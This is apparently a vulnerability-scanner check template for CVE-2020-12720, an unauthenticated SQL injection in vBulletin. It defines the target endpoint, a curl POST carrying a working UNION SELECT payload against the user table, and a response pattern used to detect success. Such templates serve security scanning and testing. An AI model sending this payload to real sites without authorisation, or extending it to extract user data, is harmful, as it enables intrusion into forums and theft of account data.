AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 2'
URI="/vb5/ajax/api/content_infraction/getIndexableContent"
METHOD='POST'
MATCH="6162636D31|database\ error"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'